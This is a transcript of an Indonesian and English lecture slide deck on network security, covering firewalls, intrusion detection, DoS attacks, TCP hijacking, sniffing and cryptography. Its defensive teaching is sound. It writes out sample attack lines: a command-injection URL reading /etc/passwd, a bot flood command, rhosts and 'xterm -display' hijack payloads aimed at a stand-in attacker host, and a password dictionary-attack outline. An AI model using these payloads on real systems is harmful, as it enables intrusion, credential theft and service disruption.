NETWORK SECURITY

60
+ NETWORK SECURITY Indra Priyandono

description

NETWORK SECURITY. Indra Priyandono. A Brief History of the World. Overview. Apa itu security? Kenapa kita perlu security? Apa saja yang rentan ? Serangan keamanan umum dan penanggulangan Firewalls & Intrusion Detection Systems Denial of Service Attacks TCP Attacks Packet Sniffing - PowerPoint PPT Presentation

Transcript of NETWORK SECURITY

Page 1: NETWORK SECURITY

+

NETWORK SECURITYIndra Priyandono

Page 2: NETWORK SECURITY

+A Brief History of the World

Page 3: NETWORK SECURITY

+Overview Apa itu security? Kenapa kita perlu security? Apa saja yang rentan? Serangan keamanan umum dan

penanggulangan Firewalls & Intrusion Detection Systems Denial of Service Attacks TCP Attacks Packet Sniffing Social Problems

Page 4: NETWORK SECURITY

+Apakah itu“Security”

Dictionary.com : 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear;

confidence. 3. Something that gives or assures safety, as:

1. A group or department of private guards: Call building security if a visitor acts suspicious.

2. Measures adopted by a government to prevent espionage, sabotage, or attack.

3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.

…etc.

Page 5: NETWORK SECURITY

+Apakah itu“Security”

Dictionary.com says: 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear;

confidence. 3. Something that gives or assures safety,

as: 1. A group or department of private

guards: Call building security if a visitor acts suspicious.

2. Measures adopted by a government to prevent espionage, sabotage, or attack.

3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.

…etc.

Page 6: NETWORK SECURITY

+Apakah itu“Security”

Dictionary.com says: 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear;

confidence. 3. Something that gives or assures safety,

as: 1. A group or department of private

guards: Call building security if a visitor acts suspicious.

2. Measures adopted by a government to prevent espionage, sabotage, or attack.

3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.

…etc.

Page 7: NETWORK SECURITY

+Apakah itu“Security”

Dictionary.com says: 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear;

confidence. 3. Something that gives or assures safety, as:

1. A group or department of private guards: Call building security if a visitor acts suspicious.

2. Measures adopted by a government to prevent espionage, sabotage, or attack.

3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.

…etc.

Page 8: NETWORK SECURITY

+Kenapa Kita Perlu Security?

Melindungi informasi penting sementara masih memungkinkan akses ke mereka yang membutuhkannya Trade secrets, medical records, dll.

Menyediakan otentikasi dan kontrol akses untuk sumber daya Ex: AFS

Jaminan ketersediaan sumber daya Ex: 5 9’s (99.999% reliability)

Page 9: NETWORK SECURITY

+Apa saja yang Rentan?

Lembaga keuangan dan bank Penyedia layanan Internet Perusahaan farmasi Instansi pemerintah dan pertahanan Kontraktor ke berbagai instansi pemerintah Perusahaan multinasional ANYONE ON THE NETWORK!

Page 10: NETWORK SECURITY

+Serangan Keamanan Umum dan Penanggulangan

Menemukan jalan ke jaringan Firewalls

Pemanfaatan software bug, buffer overflows Intrusion Detection Systems

Denial of Service Ingress filtering, IDS

Page 11: NETWORK SECURITY

+Serangan Keamanan Umum dan Penanggulangan

TCP hijacking IPSec

Packet sniffing Encryption (SSH, SSL, HTTPS)

Social problems Education

Page 12: NETWORK SECURITY

+Firewalls

Masalah dasar - banyak aplikasi jaringan dan protokol memiliki masalah keamanan yang tetap dari waktu ke waktu Menjaga agar host selalu aman Solution

Administrator membatasi akses ke host dengan menggunakan firewall

Firewall tetap up-to-date oleh

Page 13: NETWORK SECURITY

+Firewalls

Firewall adalah seperti sebuah kastil dengan jembatan tarik Hanya satu titik akses ke jaringan Ini bisa baik atau buruk

Bisa hardware atau software Ex. beberapa routers dengen fungsi firewall ipfw, ipchains, pf pada Unix systems,

Windows XP dan Mac OS X mempunyai firewalls bult in

Page 14: NETWORK SECURITY

+Firewalls

Intranet

DMZInternet

Firewall

Firewall

Web server, email server, web proxy, etc

Page 15: NETWORK SECURITY

+Firewalls

Digunakan untuk paket filter didasarkan pada kombinasi dari fitur Ini disebut packet filtering firewall Ex. Drop paket dengan port tujuan 23

(Telnet) Dapat menggunakan kombinasi dari

IP/UDP/TCP header informasi manual ipfw pada unix utnuk lebih detail

Page 16: NETWORK SECURITY

+Firewalls Berikut adalah komputer default Windows XP

terlihat seperti: 135/tcp open loc-srv 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 3389/tcp open ms-term-serv 5000/tcp open UPnP

Mungkin perlu beberapa layanan tsb, atau kita tidak dapat mengontrol semua mesin pada jaringan

Page 17: NETWORK SECURITY

+Firewalls

Aturan firewall terlihat seperti apa? Tergantung pada firewall digunakan

Example: ipfw /sbin/ipfw add deny tcp from cracker.evil.org

to wolf.tambov.su telnet Contoh lain: WinXP & Mac OS X mempunyai

built in firewalls GUI yang berbeda Macam kompleksitasnya

Page 18: NETWORK SECURITY

+Intrusion Detection

Digunakan untuk memantau "aktivitas yang mencurigakan" pada jaringan Dapat melindungi terhadap eksploitasi

perangkat lunak yang diketahui, seperti buffer overflows

Open Source IDS: Snort, www.snort.org

Page 19: NETWORK SECURITY

+Intrusion Detection

Menggunakan “intrusion signatures” Mengenali patterns of behavior

Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.

Example IRIX vulnerability pada webdist.cgi

“/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”

Namun, IDS hanya berguna untuk mengetahui jika ada rencana kemungkinan serangan

Page 20: NETWORK SECURITY

+Minor Detour…

Say we got the /etc/passwd file from the IRIX server What can we do with it?

Page 21: NETWORK SECURITY

+Dictionary Attack

We can run a dictionary attack on the passwords The passwords in /etc/passwd are encrypted

with the crypt(3) function (one-way hash) Can take a dictionary of words, crypt() them

all, and compare with the hashed passwordsThis is why your passwords should be

meaningless random junk! For example, “sdfo839f” is a good password

That is not my andrew password Please don’t try it either

Page 22: NETWORK SECURITY

+Denial of Service

Tujuan: Membuat layanan jaringan tidak dapat digunakan, biasanya dengan melakukan overloading server atau jaringan

Berbagai jenis serangan DoS SYN flooding SMURF Distributed attacks

Page 23: NETWORK SECURITY

+Denial of ServiceNormal 3-way Handshake

SYN: PC Pengguna: “Hallo”

ACK-SYN: Server: “Anda ingin berkomunikasi?”

ACK: PC Pengguna “Ya”

DoS Handshake

SYN: PC Pengguna mengirim “hallo” berulang-ulang

ACK-SYN: Server merespons “Komunikasi?” berulang-ulang

No Response: PC Pengguna menunggu sampai server “timeout”

Pengguna Server

Pengguna Server

Page 24: NETWORK SECURITY

+Attacker Utama Attacker 1

Attacker 2

Attacker 3

Attacker 4

Attacker 5

Attacker 6

Attacker 7

Attacker 8 Server

Attacker utama melancarkan SYN floods dari beberapa tempat

Page 25: NETWORK SECURITY

+Denial of Service

Page 26: NETWORK SECURITY

+Denial of Service

Ping broadcast (smurf) Menggunakan IPspoofing (mengubah no IP dari

request) Respon dari ping dialamatkan ke komputer yang

IP-nya dispoof Akibatnya komputer tersbut akan banyak

menerima paket Terjadi pemborosan bandwidth Dapat mengakibatkan DoS Attack

Page 27: NETWORK SECURITY

+Denial of Service

Internet

Perpetrator V ictim

ICM P echo (spoofed source address o f vic tim )Sent to IP broadcast address

IC M P echo rep ly

Page 28: NETWORK SECURITY

+Denial of Service Distributed Denial of Service

Sama seperti teknik DoS biasa, tetapi pada skala yang jauh lebih besar

Example: Sub7Server Trojan dan IRC bots Menginfeksi sejumlah besar mesin dengan

program "zombie" Program Zombie log in ke IRC dan menunggu

perintahExample:

Perintah Bot: !p4 207.71.92.193 hasil: runs ping.exe 207.71.92.193 -l 65500 -n

10000 mengirim 10,000 64k packets ke host

(655MB!)

Page 29: NETWORK SECURITY

+Denial of Service

Mini Case Study – CodeRedJuly 19, 2001: over 359,000

computers infected with Code-Red in less than 14 hours

Used a recently known buffer exploit in Microsoft IIS

Damages estimated in excess of $2.6 billion

Page 30: NETWORK SECURITY

+Denial of Service

Why is this under the Denial of Service category?CodeRed launched a DDOS attack

against www1.whitehouse.gov from the 20th to the 28th of every month!

Spent the rest of its time infecting other hosts

Page 31: NETWORK SECURITY

+Denial of Service

How can we protect ourselves?Ingress filtering

If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it

RFC 2267 has more information about thisStay on top of CERT advisories and the

latest security patches A fix for the IIS buffer overflow was

released sixteen days before CodeRed had been deployed!

Page 32: NETWORK SECURITY

+TCP Attacks

Recall how IP works…End hosts create IP packets and

routers process them purely based on destination address alone

Problem: End hosts may lie about other fields which do not affect deliverySource address – host may trick

destination into believing that the packet is from a trusted source Especially applications which use IP

addresses as a simple authentication method

Solution – use better authentication methods

Page 33: NETWORK SECURITY

+TCP Attacks

TCP connections have associated stateStarting sequence numbers, port

numbers Problem – what if an attacker learns these values?

Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)

Sequence numbers are sometimes chosen in very predictable ways

Page 34: NETWORK SECURITY

+TCP Attacks

If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!

Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original sourceEx. Instead of downloading and

running new program, you download a virus and execute it

Page 35: NETWORK SECURITY

+TCP Attacks

Say hello to Alice, Bob and Mr. Big Ears

Page 36: NETWORK SECURITY

+TCP Attacks

Alice and Bob have an established TCP connection

Page 37: NETWORK SECURITY

+TCP Attacks

Mr. Big Ears lies on the path between Alice and Bob on the networkHe can intercept all of their packets

Page 38: NETWORK SECURITY

+TCP Attacks

First, Mr. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?)

Packets

The Void

Page 39: NETWORK SECURITY

+TCP Attacks

Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network)

ISN, SRC=Alice

Page 40: NETWORK SECURITY

+TCP Attacks

What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?Can just DoS Alice instead of dropping

her packetsCan just send guesses of what the ISN

is until it is accepted How do you know when the ISN is accepted?

Mitnick: payload is “add self to .rhosts”

Or, “xterm -display MrBigEars:0”

Page 41: NETWORK SECURITY

+TCP Attacks

Why are these types of TCP attacks so dangerous?

Web server

Malicious user

Trusting web client

Page 42: NETWORK SECURITY

+TCP Attacks

How do we prevent this? IPSec

Provides source authentication, so Mr. Big Ears cannot pretend to be Alice

Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is

Page 43: NETWORK SECURITY

+Packet Sniffing

Ingat bagaimana Ethernet bekerja ... Ketika seseorang ingin mengirim paket ke tujuan... Mereka menempatkan bit pada kabel dengan tujuan

alamat MAC ... Dan ingat bahwa host lain mendengarkan pada kawat

untuk mendeteksi collisions ... Ini tidak bisa lebih mudah untuk mencari tahu data apa

yang sedang dikirim melalui jaringan!

Page 44: NETWORK SECURITY

+Packet Sniffing

Ini bekerja untuk wireless juga! Bahkan, ia bekerja untuk setiap media broadcast-based

Page 45: NETWORK SECURITY

+Packet Sniffing

Data jenis apa yang bisa kita dapatkan? Ditanyakan cara lain, apa jenis informasi akan

sangat berguna untuk pengguna berbahaya? Jawaban: Apa pun dalam teks biasa

(plaintext) Paling popular adalah Password

Page 46: NETWORK SECURITY

+Packet Sniffing Bagaimana kita bisa melindungi diri kita sendiri? SSH, bukan Telnet

Banyak orang menggunakan Telnet dan mengirim password mereka dengan jelas (menggunakan Putty sebagai gantinya!)

HTTP over SSL Terutama ketika melakukan pembelian dengan kartu kredit!

SFTP, bukan FTP Kecuali Anda benar-benar tidak peduli tentang password atau

data IPSec

Menyediakan kerahasiaan pada network-layer

Page 47: NETWORK SECURITY

+

Kriptografi

Page 48: NETWORK SECURITY

+Tujuan

Ada empat tujuan mendasar dari ilmu kriptografi ini yang juga merupakan aspek keamanan informasi yaitu : Kerahasiaan, adalah layanan yang digunakan untuk

menjaga isi dari informasi dari siapapun kecuali yang memiliki otoritas ataukunci rahasia untuk membuka/mengupas informasi yang telah disandi.

Integritas data, adalah berhubungan dengan penjagaan dari perubahan data secara tidak sah. Untuk menjaga integritas data, sistem harus memiliki kemampuan untuk mendeteksi manipulasi data oleh pihak-pihak yang tidak berhak, antara lain penyisipan, penghapusan, dan pensubsitusian data lain kedalam data yang sebenarnya.

Page 49: NETWORK SECURITY

+

Autentikasi, adalah berhubungan dengan identifikasi/pengenalan, baik secara kesatuan sistem maupun informasi itu sendiri. Dua pihak yang saling berkomunikasi harus saling memperkenalkan diri. Informasi yang dikirimkan melalui kanal harus diautentikasi keaslian, isi datanya, waktu pengiriman, dan lain-lain.

Non-repudiasi., atau nirpenyangkalan adalah usaha untuk mencegah terjadinya penyangkalan terhadap pengiriman/terciptanya suatu informasi oleh yang mengirimkan/membuat.

Page 50: NETWORK SECURITY

+Algoritma Sandi

Algoritma sandi adalah algoritma yang berfungsi untuk melakukan tujuan kriptografis

 Algoritma tersebut harus memiliki kekuatan untuk melakukan (dikemukakan oleh Shannon): konfusi/pembingungan (confusion), dari teks

terang sehingga sulit untuk direkonstruksikan secara langsung tanpa menggunakan algoritma dekripsinya

difusi/peleburan (difusion), dari teks terang sehingga karakteristik dari teks terang tersebut hilang.

Page 51: NETWORK SECURITY

+

Secara umum berdasarkan kesamaan kuncinya, algoritma sandi dibedakan menjadi kunci-simetris/symetric-key, sering disebut

juga algoritma sandi konvensional karena umumnya diterapkan pada algoritma sandi klasik

kunci-asimetris/asymetric-key

Page 52: NETWORK SECURITY

+

Berdasarkan arah implementasi dan pembabakan jamannya dibedakan menjadi : algoritma sandi klasik classic cryptography algoritma sandi modern modern cryptography

Page 53: NETWORK SECURITY

+

Berdasarkan kerahasiaan kuncinya dibedakan menjadi : algoritma sandi kunci rahasia secret-key algoritma sandi kunci publik publik-key

Page 54: NETWORK SECURITY

+Algoritma sandi kunci-simetris Skema algoritma sandi akan disebut kunci-

simetris apabila untuk setiap proses enkripsi maupun dekripsi data secara keseluruhan digunakan kunci yang sama. Skema ini berdasarkan jumlah data per proses dan alur pengolahan data didalamnya dibedakan menjadi dua kelas, yaitu block-cipher dan stream-cipher.

Page 55: NETWORK SECURITY

+Block-Cipher

ECB, Electronic Code Book CBC, Cipher Block Chaining OFB, Output Feed Back CFB, Cipher Feed Back

Page 56: NETWORK SECURITY

+Stream-Cipher

Stream-cipher adalah algoritma sandi yang mengenkripsi data persatuan data, seperti bit, byte, nible atau per lima bit(saat data yang di enkripsi berupa data Boudout). Setiap mengenkripsi satu satuan data digunakan kunci yang merupakan hasil pembangkitan dari kunci sebelum.

Page 57: NETWORK SECURITY

+Algoritma-algoritma sandi kunci-simetrisBeberapa contoh algoritma yang menggunakan kunci-simetris: DES - Data Encryption Standard blowfish twofish MARS IDEA 3DES - DES diaplikasikan 3 kali AES - Advanced Encryption Standard, yang bernama

asli rijndael

Page 58: NETWORK SECURITY

+Fungsi Hash Kriptografis

Fungsi hash yang memiliki beberapa sifat keamanan tambahan sehingga dapat dipakai untuk tujuan keamanan data

Digunakan untuk keperluan autentikasi dan integritas data

Secara efisien mengubah string input dengan panjang berhingga menjadi string output dengan panjang tetap yang disebut nilai hash

Page 59: NETWORK SECURITY

+Sifat-Sifat Fungsi Hash Kriptografi Tahan preimej (Preimage resistant): bila

diketahui nilai hash h maka sulit (secara komputasi tidak layak) untuk mendapatkan m dimana h = hash(m).

Tahan preimej kedua (Second preimage resistant): bila diketahui input m1 maka sulit mencari input m2 (tidak sama dengan m1) yang menyebabkan hash(m1) = hash(m2).

Tahan tumbukan (Collision-resistant): sulit mencari dua input berbeda m1 dan m2 yang menyebabkan hash(m1) = hash(m2)

Page 60: NETWORK SECURITY

+Algoritma-Algoritma Fungsi Hash KriptografiBeberapa contoh algoritma fungsi hash Kriptografi: MD4 MD5 SHA-0 SHA-1 SHA-256 SHA-512